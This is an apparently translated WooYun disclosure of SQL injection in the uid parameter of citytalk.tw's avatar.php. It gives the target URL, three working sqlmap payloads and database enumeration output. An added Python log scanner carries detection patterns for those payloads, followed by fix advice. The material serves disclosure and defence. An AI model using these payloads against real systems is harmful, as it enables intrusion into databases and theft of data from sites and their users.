
Vulnerability summary

Defect ID: wooyun-2015-0123939

Title: SQL injection in citytalk (城市通), Taiwan, affecting 80 databases

Affected vendor: Hitcon (Taiwan Internet vulnerability reporting platform)

Author: 路人甲

Submitted: 2015-07-01 18:50

Fixed: 2015-08-17 11:30

Published: 2015-08-17 11:30

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organization (Hitcon, Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-01: Details sent to the vendor; awaiting vendor response
2015-07-03: Vendor confirmed; details disclosed to the vendor only
2015-07-13: Details disclosed to core white hats and relevant domain experts
2015-07-23: Details disclosed to regular white hats
2015-08-02: Details disclosed to intern white hats
2015-08-17: Details disclosed to the public

Brief description:

SQL injection.

Detailed description:

www.citytalk.tw/bbs/uc_server/avatar.php?size=small&uid='

Proof of vulnerability:

---
Parameter: uid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: size=small&uid=1' RLIKE (SELECT (CASE WHEN (8269=8269) THEN 1 ELSE 0x28 END)) AND 'AuES'='AuES
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: size=small&uid=1' AND (SELECT 1078 FROM(SELECT COUNT(*),CONCAT(0x7170786a71,(SELECT (ELT(1078=1078,1))),0x7171627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LOiw'='LOiw
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: size=small&uid=1' OR SLEEP(5) AND 'owgl'='owgl
---
back-end DBMS: MySQL >= 5.0.0
current user: 'root@%'
current user is DBA: False
available databases [84]:

Fix recommendation:

A very large amount of data.

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)
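
The report gives no remediation, so here is an added detection example that is not part of the original report: it scans web-server access-log lines for requests to the avatar.php endpoint whose uid parameter is not a plain integer and labels each hit with the sqlmap technique it resembles (boolean-based blind, error-based, time-based). The log lines, timestamps and IP addresses are constructed; the endpoint path and the payload shapes are taken from the proof section above.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed access-log lines (not from the report): the targets follow the
# /bbs/uc_server/avatar.php?size=small&uid=... endpoint and the three sqlmap payloads
# quoted in the proof section; IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2015:18:40:01 +0800] "GET /bbs/uc_server/avatar.php?size=small&uid=1001 HTTP/1.1" 200 2310
203.0.113.7 - - [01/Jul/2015:18:40:05 +0800] "GET /bbs/uc_server/avatar.php?size=small&uid=' HTTP/1.1" 500 0
203.0.113.7 - - [01/Jul/2015:18:40:09 +0800] "GET /bbs/uc_server/avatar.php?size=small&uid=1'%20RLIKE%20(SELECT%20(CASE%20WHEN%20(8269=8269)%20THEN%201%20ELSE%200x28%20END))%20AND%20'AuES'='AuES HTTP/1.1" 200 2310
203.0.113.7 - - [01/Jul/2015:18:40:12 +0800] "GET /bbs/uc_server/avatar.php?size=small&uid=1'%20AND%20(SELECT%201078%20FROM(SELECT%20COUNT(*),CONCAT(0x7170786a71,(SELECT%20(ELT(1078=1078,1))),0x7171627071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'LOiw'='LOiw HTTP/1.1" 500 0
203.0.113.7 - - [01/Jul/2015:18:40:20 +0800] "GET /bbs/uc_server/avatar.php?size=small&uid=1'%20OR%20SLEEP(5)%20AND%20'owgl'='owgl HTTP/1.1" 200 2310
198.51.100.9 - - [01/Jul/2015:18:41:00 +0800] "GET /bbs/uc_server/avatar.php?size=middle&uid=42 HTTP/1.1" 200 3012
"""

# Common log format: client IP, identd, user, [timestamp], "request line", status.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

# Signatures for the techniques sqlmap reported against this endpoint, checked in order.
TECHNIQUES = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(|\bBENCHMARK\s*\(", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I)),
    ("boolean-based blind", re.compile(r"\bRLIKE\b|\bCASE\s+WHEN\b", re.I)),
]

def classify_uid(value):
    """Return None for a well-formed uid (decimal integer); otherwise the suspected technique."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    for name, pattern in TECHNIQUES:
        if pattern.search(value):
            return name
    return "malformed uid"  # e.g. the bare quote used as the first probe

def scan_log(text):
    """Return (ip, uid, verdict) for each avatar.php request whose uid is not a clean integer."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if not url.path.endswith("/uc_server/avatar.php"):
            continue
        # parse_qs percent-decodes, so %20 in the log becomes a space here.
        for uid in parse_qs(url.query, keep_blank_values=True).get("uid", []):
            verdict = classify_uid(uid)
            if verdict is not None:
                hits.append((m.group("ip"), uid, verdict))
    return hits
```

Server-side, the same rule is the fix: the uid value should be cast to an integer or bound as a query parameter before it reaches SQL, and the application should not connect as root (the output above shows current user 'root@%').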


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-07-03 11:30

Vendor reply:

Thanks for the report!!

Latest status:

None yet